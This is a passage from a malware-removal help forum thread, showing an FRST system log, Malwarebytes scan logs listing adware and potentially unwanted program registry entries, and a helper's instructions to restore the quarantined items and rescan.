2016-02-10 09:09 - 2016-01-31 00:16 - 00950272 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-10 09:09 - 2016-01-31 00:13 - 04791808 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-02-10 09:09 - 2016-01-31 00:13 - 00123392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasman.dll
2016-02-10 09:09 - 2016-01-31 00:13 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
2016-02-10 09:09 - 2016-01-31 00:11 - 00678400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-02-10 09:09 - 2016-01-31 00:11 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-10 09:09 - 2016-01-31 00:11 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-10 09:09 - 2016-01-31 00:06 - 02316800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-02-10 09:09 - 2016-01-31 00:05 - 01380864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-02-10 09:09 - 2016-01-31 00:05 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-10 09:09 - 2016-01-31 00:04 - 00100352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-10 09:09 - 2016-01-31 00:02 - 03580416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-02-10 09:09 - 2016-01-31 00:02 - 00768000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-02-10 09:09 - 2016-01-30 23:58 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-09 14:43 - 2015-08-27 20:40 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-03-09 14:43 - 2010-08-20 12:11 - 00000000 ___RD C:\Users\Lexi\My Pictures
2016-03-09 14:41 - 2015-07-10 07:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-03-09 14:41 - 2015-07-10 07:20 - 00346024 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-03-09 14:40 - 2014-12-06 19:51 - 00000000 ____D C:\WINDOWS\5E1775C3DDD942C3831C153492BCD983.TMP
2016-03-09 14:39 - 2015-07-10 04:05 - 07864320 ___SH C:\WINDOWS\system32\config\BBI
2016-03-09 14:38 - 2015-07-10 06:04 - 00000000 ____D C:\Program Files\Windows Portable Devices
2016-03-09 14:38 - 2015-07-10 06:04 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2016-03-09 14:38 - 2015-07-10 06:04 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2016-03-09 14:38 - 2015-07-10 06:04 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2016-03-09 14:38 - 2015-07-10 06:02 - 00000000 ____D C:\WINDOWS\INF
2016-03-09 14:18 - 2016-01-28 23:32 - 00004150 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{5ED844AE-3C2D-4062-87D9-F7E3150673DE}
2016-03-09 14:09 - 2012-04-07 21:50 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-03-09 11:17 - 2015-07-10 05:55 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-03-09 10:18 - 2013-09-26 08:59 - 00000000 ____D C:\Users\Lexi\AppData\Local\Skitch
2016-03-09 10:02 - 2015-08-27 20:13 - 00000000 ____D C:\Users\Lexi
2016-03-09 10:02 - 2011-05-20 12:30 - 00000000 ____D C:\Users\Lexi\AppData\LocalLow\Temp
2016-03-09 00:31 - 2013-08-07 12:46 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-03-09 00:18 - 2013-05-27 17:31 - 143659408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-03-08 22:39 - 2015-07-10 06:04 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-08 22:39 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-03-08 22:06 - 2016-01-28 15:11 - 00000000 ____D C:\Program Files (x86)\Avidemux 2.6 - 32 bits
2016-03-08 22:06 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\system32\AppLocker
2016-03-08 22:06 - 2013-06-18 14:19 - 00000000 ____D C:\Program Files (x86)\File Type Helper
2016-03-08 22:06 - 2013-02-20 00:03 - 00000000 ____D C:\WINDOWS\SysWOW64\C2MP
2016-03-08 22:06 - 2010-08-13 21:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amazon.com
2016-03-08 22:05 - 2015-11-14 19:53 - 00000000 ____D C:\Users\DefaultAppPool
2016-03-08 22:05 - 2015-07-10 08:14 - 00000000 ____D C:\WINDOWS\ShellNew
2016-03-08 22:05 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\system32\WinMetadata
2016-03-08 22:05 - 2013-09-26 08:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skitch
2016-03-08 22:05 - 2013-07-20 16:02 - 00000000 ____D C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ClockworkMod
2016-03-08 22:05 - 2011-08-24 08:48 - 00000000 ____D C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Duplicate Cleaner
2016-03-08 22:05 - 2011-08-24 08:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2016-03-08 22:04 - 2016-02-01 17:19 - 00000000 ____D C:\WINDOWS\Minidump
2016-03-08 22:04 - 2016-01-28 16:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Free AVI MPEG WMV MP4 FLV Video Joiner
2016-03-08 22:04 - 2016-01-28 15:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avidemux (32bits)
2016-03-08 22:04 - 2015-07-10 08:14 - 00000000 ____D C:\Program Files\Windows Journal
2016-03-08 22:04 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\rescache
2016-03-08 22:04 - 2015-07-10 06:04 - 00000000 ____D C:\Program Files\Windows Defender
2016-03-08 22:04 - 2015-07-10 04:05 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-03-08 22:04 - 2013-09-10 08:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
2016-03-08 22:04 - 2013-01-17 18:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BodyMedia
2016-03-08 22:04 - 2012-11-10 18:24 - 00000000 ____D C:\Users\Lexi\AppData\Local\Scholastic
2016-03-08 22:04 - 2012-09-15 23:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Garmin
2016-03-08 22:04 - 2012-06-22 18:42 - 00000000 ____D C:\Users\Lexi\AppData\Roaming\PCCUStubInstaller
2016-03-08 22:04 - 2011-08-24 08:18 - 00000000 ____D C:\WINDOWS\System32\Tasks\Apple
2016-03-08 22:04 - 2010-09-24 19:55 - 00000000 ____D C:\Users\Lexi\Documents\Audible
2016-03-08 22:04 - 2010-09-19 09:15 - 00000000 ____D C:\Users\Lexi\AppData\Local\Microsoft Help
2016-03-08 22:03 - 2016-01-28 16:40 - 00000000 ____D C:\Program Files (x86)\Free AVI MPEG WMV MP4 FLV Video Joiner
2016-03-08 22:03 - 2013-09-10 08:38 - 00000000 ____D C:\Program Files (x86)\Coupons
2016-03-08 22:03 - 2013-07-20 16:01 - 00000000 ____D C:\Program Files (x86)\ClockworkMod
2016-03-08 22:03 - 2013-05-28 16:57 - 00000000 ____D C:\Program Files (x86)\Evernote
2016-03-08 22:03 - 2013-05-27 22:25 - 00000000 ____D C:\Program Files (x86)\Belarc
2016-03-08 22:03 - 2013-01-17 18:40 - 00000000 ____D C:\Program Files (x86)\BodyMedia
2016-03-08 22:03 - 2012-12-03 01:42 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-03-08 22:03 - 2012-09-15 23:53 - 00000000 ____D C:\Program Files (x86)\Garmin
2016-03-08 22:03 - 2012-06-18 22:23 - 00000000 ____D C:\Program Files (x86)\LG Electronics
2016-03-08 22:03 - 2011-08-24 08:49 - 00000000 ____D C:\Program Files (x86)\Bing Bar Installer
2016-03-08 22:03 - 2011-08-24 08:48 - 00000000 ____D C:\Program Files (x86)\Duplicate Cleaner
2016-03-08 22:03 - 2011-08-24 08:22 - 00000000 ____D C:\Program Files\iTunes
2016-03-08 22:03 - 2011-08-24 08:22 - 00000000 ____D C:\Program Files\iPod
2016-03-08 22:03 - 2011-08-24 08:22 - 00000000 ____D C:\Program Files (x86)\iTunes
2016-03-08 22:03 - 2011-08-24 08:18 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-03-08 22:03 - 2011-08-24 08:18 - 00000000 ____D C:\Program Files (x86)\Apple Software Update
2016-03-08 22:03 - 2011-08-24 08:17 - 00000000 ____D C:\Program Files\Bonjour
2016-03-08 22:03 - 2011-08-24 08:17 - 00000000 ____D C:\Program Files (x86)\Bonjour
2016-03-08 22:03 - 2011-01-14 18:51 - 00000000 ____D C:\Program Files (x86)\Cozi Express
2016-03-08 22:03 - 2010-05-28 20:42 - 00000000 ____D C:\Program Files (x86)\Google
2016-03-08 22:03 - 2010-05-28 20:35 - 00000000 ____D C:\Program Files (x86)\TOSHIBA
2016-03-08 22:03 - 2010-05-28 20:34 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-03-08 22:03 - 2010-05-28 20:34 - 00000000 ____D C:\Program Files\TOSHIBA
2016-03-08 21:48 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\registration
2016-03-08 21:47 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\SystemResources
2016-03-08 21:42 - 2014-04-26 20:45 - 00000000 ____D C:\Users\Lexi\Documents\Bio101
2016-03-08 21:41 - 2015-08-27 20:40 - 00000000 ____D C:\Users\Lexi\AppData\Local\Packages
2016-03-08 21:38 - 2011-08-24 08:22 - 00000000 ____D C:\ProgramData\{93E26451-CD9A-43A5-A2FA-C42392EA4001}
2016-03-08 21:38 - 2010-08-20 12:24 - 00000000 ____D C:\Users\Lexi\AppData\Local\Google
2016-03-08 21:37 - 2011-08-24 08:17 - 00000000 ____D C:\ProgramData\Apple
2016-03-08 21:36 - 2010-05-28 20:42 - 00000000 ____D C:\Program Files\Google
2016-03-08 21:34 - 2010-08-13 21:25 - 00000000 __RHD C:\MSOCache
2016-03-07 22:57 - 2011-01-14 18:51 - 00000000 ____D C:\ProgramData\Cozi
2016-03-07 22:56 - 2010-08-13 21:56 - 00000000 ____D C:\Program Files (x86)\TOSHIBA Corporation
2016-03-04 11:31 - 2010-08-13 21:57 - 00000000 ___HD C:\WINDOWS\msdownld.tmp
2016-03-04 07:39 - 2015-08-28 00:05 - 00000000 ___DC C:\WINDOWS\Panther
2016-03-04 07:19 - 2015-10-30 04:42 - 00000000 ___HD C:\$WINDOWS.~BT
2016-03-03 23:16 - 2012-11-10 18:24 - 00000000 ____D C:\Users\Lexi\Documents\Storia
2016-02-26 12:07 - 2010-09-04 17:25 - 00000000 ____D C:\Users\Lexi\AppData\Roaming\AnVi
2016-02-25 22:42 - 2015-08-27 20:11 - 01005598 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-02-25 20:45 - 2010-08-30 21:35 - 00012288 _____ C:\Users\Lexi\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2016-02-20 19:59 - 2013-01-13 11:18 - 630943674 _____ C:\WINDOWS\MEMORY.DMP
2016-02-20 14:50 - 2016-01-28 11:18 - 00000000 ____D C:\Users\Lexi\AppData\Local\Screencast-O-Matic-v2
2016-02-19 17:17 - 2013-03-05 16:40 - 00002283 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-19 17:17 - 2013-03-05 16:40 - 00002271 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-02-16 22:41 - 2016-01-12 21:09 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-02-16 22:41 - 2012-05-30 11:51 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service

==================== Files in the root of some directories =======

2016-01-28 17:15 - 2016-01-28 17:15 - 0000047 _____ () C:\Users\Lexi\AppData\Roaming\WB.CFG
2011-03-24 12:02 - 2015-12-07 21:16 - 0000618 _____ () C:\Users\Lexi\AppData\Roaming\wklnhst.dat
2010-08-30 21:35 - 2016-02-25 20:45 - 0012288 _____ () C:\Users\Lexi\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-07-02 19:22 - 2011-07-02 19:22 - 0000188 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc

Some files in TEMP:
====================
C:\Users\Lexi\AppData\Local\Temp\sqlite-3.7.2-sqlitejdbc.dll


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-03-08 23:13

==================== End of FRST.txt ============================

Link to post
Share on other sites

Also this log problem occured on 3/7/2016 as well.  I downloaded malwarebytes ran it, couldn't use my windows features, restored to a point before I downloaded it, reran malwarebytes, did all the suggested options AND deleted the quarantined items.  The  log for that time and date (which is actually supposed to say 6:11)  indicate no such actions which is when I signed up for the forums:

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 3/7/2016
Scan Time: 10:00 PM
Logfile:
Administrator: Yes

Version: 0.0.0.0000
Malware Database: v2016.03.08.01
Rootkit Database: v2016.02.27.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
File System: NTFS
User: Lexi

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 432217
Time Elapsed: 35 min, 32 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)

Link to post
Share on other sites

 

The log does not appear to be accurate as it found around 117 things and moved them to the quarantene

 

That is a quote from your reply #9 if all of those entries are in quarantine it is a simple action to restore them all.....

 

Open Malwarebytes, select > History > Quarantine..

 

In quarantine select all items then select  restore. All removed entries will be restored....

 

With that action complete re-boot your PC.

 

Open Malwarebytes again, run a threat scan but this time take no action, do not remove any entries. Post that log....

post-3601-0-14472600-1457563242_thumb.pn

Link to post
Share on other sites

I just did at you suggested.  Stopping at the point you mentione.  No log is present in the "history tab", but there was the link on the scan tab to export results.  I am wondering if the issues with windows are actually not permanent and are related directly to having the malwarebytes running (I have not tested to see if they are still there when the program is disabled.) 

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 3/9/2016
Scan Time: 6:10 PM
Logfile:
Administrator: Yes

Version: 2.2.0.1024
Malware Database: v2016.03.09.06
Rootkit Database: v2016.02.27.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
File System: NTFS
User: Lexi

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 420528
Time Elapsed: 39 min, 47 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 1
PUP.Optional.FastFreeConverter, C:\Program Files (x86)\Fast Free Converter\FastFreeConverterUpdt.exe, 1376, , [eeccd9acfd9c54e20f7621e0ae5649b7]

Modules: 0
(No malicious items detected)

Registry Keys: 62
PUP.Optional.FastFreeConverter, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{8232785C-5C98-4A6E-B7B4-911FFBED7582}, , [5e5cbacbafea11259c32bc0bd2300cf4],
PUP.Optional.FastFreeConverter, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{8232785C-5C98-4A6E-B7B4-911FFBED7582}, , [5e5cbacbafea11259c32bc0bd2300cf4],
PUP.Optional.FastFreeConverter, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{8232785C-5C98-4A6E-B7B4-911FFBED7582}, , [5e5cbacbafea11259c32bc0bd2300cf4],
PUP.Optional.FastFreeConverter, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{8232785C-5C98-4A6E-B7B4-911FFBED7582}, , [5e5cbacbafea11259c32bc0bd2300cf4],
PUP.Optional.FastFreeConverter, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{8232785C-5C98-4A6E-B7B4-911FFBED7582}, , [5e5cbacbafea11259c32bc0bd2300cf4],
PUP.Optional.FunWebProducts, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{1D4DB7D2-6EC9-47A3-BD87-1E41684E07BB}, , [61591075aced0531a8f9c8eeb05203fd],
PUP.Optional.FunWebProducts, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{1D4DB7D2-6EC9-47A3-BD87-1E41684E07BB}, , [61591075aced0531a8f9c8eeb05203fd],
PUP.Optional.FunWebProducts, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{1D4DB7D2-6EC9-47A3-BD87-1E41684E07BB}, , [61591075aced0531a8f9c8eeb05203fd],
PUP.Optional.MixiToolbar, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{62CAD681-699F-4F83-B87F-95584003592F}, , [dbdf7f06cfca0c2a29a69037d32f728e],
PUP.Optional.MixiToolbar, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{62CAD681-699F-4F83-B87F-95584003592F}, , [dbdf7f06cfca0c2a29a69037d32f728e],
PUP.Optional.MixiToolbar, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{62CAD681-699F-4F83-B87F-95584003592F}, , [dbdf7f06cfca0c2a29a69037d32f728e],
PUP.Optional.SearchToolbar, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{9D425283-D487-4337-BAB6-AB8354A81457}, , [9b1f31546a2f74c2b46220928d753cc4],
PUP.Optional.SearchToolbar, HKLM\SOFTWARE\CLASSES\SearchToolbarLib.CSearchToolbarImpl, , [9b1f31546a2f74c2b46220928d753cc4],
PUP.Optional.SearchToolbar, HKLM\SOFTWARE\CLASSES\SearchToolbarLib.CSearchToolbarImpl.1, , [9b1f31546a2f74c2b46220928d753cc4],
PUP.Optional.SearchToolbar, HKLM\SOFTWARE\WOW6432NODE\CLASSES\SearchToolbarLib.CSearchToolbarImpl, , [9b1f31546a2f74c2b46220928d753cc4],
PUP.Optional.SearchToolbar, HKLM\SOFTWARE\WOW6432NODE\CLASSES\SearchToolbarLib.CSearchToolbarImpl.1, , [9b1f31546a2f74c2b46220928d753cc4],
PUP.Optional.SearchToolbar, HKLM\SOFTWARE\CLASSES\WOW6432NODE\SearchToolbarLib.CSearchToolbarImpl, , [9b1f31546a2f74c2b46220928d753cc4],
PUP.Optional.SearchToolbar, HKLM\SOFTWARE\CLASSES\WOW6432NODE\SearchToolbarLib.CSearchToolbarImpl.1, , [9b1f31546a2f74c2b46220928d753cc4],
PUP.Optional.SearchToolbar, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{9D425283-D487-4337-BAB6-AB8354A81457}, , [9b1f31546a2f74c2b46220928d753cc4],
PUP.Optional.FastFreeConverter, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{F5580E24-8416-4DFD-90B3-078D4EDF4FCB}, , [caf0f4917227b38321225b5b38ca01ff],
PUP.Optional.FastFreeConverter, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{F5580E24-8416-4DFD-90B3-078D4EDF4FCB}, , [caf0f4917227b38321225b5b38ca01ff],
PUP.Optional.FastFreeConverter, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\FastFreeConverterUpdt, , [eeccd9acfd9c54e20f7621e0ae5649b7],
PUP.Optional.FastFreeConverter, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Fast Free Converter, , [eeccd9acfd9c54e20f7621e0ae5649b7],
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\CLASSES\Toolbar.CT2260173, , [d9e16b1abfdad26404bceafc669d9d63],
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\CLASSES\Toolbar.CT3298582, , [fdbd54314059a98d8e32d70f45bed030],
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32LDR  , , [6a50bfc67920df57b3a582a619ebc63a],
PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\INSTALLEDSDB\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}, , [0eacfa8b356471c56abdb9b28b79827e],
PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\INSTALLEDSDB\{cf2797aa-b7ec-e311-8ed9-005056c00008}, , [a2189bea0a8f78bed652e5861ee66e92],
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\Conduit, , [0ab0b4d18e0b71c5a21597e9fe069967],
PUP.Optional.MyFreeze, HKLM\SOFTWARE\WOW6432NODE\Freeze.com, , [03b78ef71c7d02342e4218fb9b6916ea],
PUP.Optional.MixiDJ, HKLM\SOFTWARE\WOW6432NODE\MixiDJ_V46, , [caf0f392e1b865d1c47e5eb4d13351af],
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Toolbar.CT2260173, , [7149d9acb4e59c9a4f71d511dd264db3],
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Toolbar.CT3298582, , [a317fc890297ad89efd1757148bb7e82],
PUP.Optional.FastFreeConverter, HKLM\SOFTWARE\WOW6432NODE\FAST FREE CONVERTER, , [d2e81b6a9bfea4923c4af60b4eb67f81],
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\CCIFDKGNONHKCMAOAPPJPMIJDHLPPGMG, , [2199f5906435d6601ba225f6679c50b0],
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{59C7FC09-1C83-4648-B3E6-003D2BBC7481}, , [b2084b3a9801d75feabdcb4657ad47b9],
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{840E3B68-A458-41B7-8D2C-5E02A27F442E}, , [cfebcabb5643bb7b58ecfcfcc93a817f],
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{9170B96C-28D4-4626-8358-27E6CAEEF907}, , [4e6ce79ee6b385b14166ec2525df6799],
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{D1A71FA0-FF48-48DD-9B6D-7A13A3E42127}, , [c7f3770ef0a9bf77a30428e948bc1be5],
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{DDB1968E-EAD6-40FD-8DAE-FF14757F60C7}, , [ba0035506d2ca98db8efdd3447bd8f71],
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{F138D901-86F0-4383-99B6-9CDD406036DA}, , [f3c7a8dd752444f2584f1ff2b252b947],
PUP.Optional.NetRadio, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\NetRadio-3_RASAPI32, , [ecce6f16e1b87eb8f5dc650dcc383ac6],
PUP.Optional.NetRadio, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\NetRadio-3_RASMANCS, , [53673352c2d7bf7730a11161fd07916f],
PUP.Optional.NetRadio, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\NetRadio_RASAPI32, , [05b5acd9643575c1bd151f53f70d669a],
PUP.Optional.NetRadio, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\NetRadio_RASMANCS, , [863440451e7bd363a1313c3660a4b14f],
PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\WOW6432NODE\SPPDCOM, , [7f3b86ff2c6dcb6bf13e3b30b450837d],
PUP.Optional.FastFreeConverter, HKLM\SOFTWARE\WOW6432NODE\ZUPDATER\FastFreeConverterUpdt.exe, , [7b3fbacb772265d1731656ab9173d729],
PUP.Optional.ConduitTB.Gen, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\Conduit, , [e9d114715c3dcd698e283b4562a24fb1],
PUP.Optional.SearchProtect.AppFlsh, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\SearchProtect, , [2892a8ddc9d055e1f6291754ae567c84],
PUP.Optional.ConduitTB.Gen, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\APPDATALOW\SOFTWARE\Conduit, , [d0eafb8a4b4ebd79a11491ef4cb8ed13],
PUP.Optional.Conduit, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\APPDATALOW\SOFTWARE\ConduitSearchScopes, , [3684364f7d1c46f04fd59662976c8b75],
PUP.Optional.FunWebProducts, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\APPDATALOW\SOFTWARE\Fun Web Products, , [01b9bcc9b4e57bbbcc21887b05ff09f7],
PUP.Optional.FunWebProducts, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\APPDATALOW\SOFTWARE\FunWebProducts, , [6258dda8eaafc27437b75fa47e864eb2],
PUP.Optional.MixiDJToolbar, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\APPDATALOW\SOFTWARE\MixiDJ_V46, , [6e4c6025d5c4ee4845ffa56d49bbc838],
PUP.Optional.ConduitTB.Gen, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\CCIFDKGNONHKCMAOAPPJPMIJDHLPPGMG, , [8b2f473ee0b965d1932b74a78b78936d],
PUP.Optional.ProductSetup, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\PRODUCTSETUP, , [edcd8ff657423bfbc8ffa9703ec6b44c],
PUP.Optional.MixiDJToolbar, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{31E3431B-8F34-49CD-AE3D-992295E853A7}, , [8a30077eabee270f0eb1d4227a88659b],
PUP.Optional.MixiDJToolbar, HKLM\SOFTWARE\CLASSES\WOW6432NODE\Toolbar.CT3298582, , [8a30077eabee270f0eb1d4227a88659b],
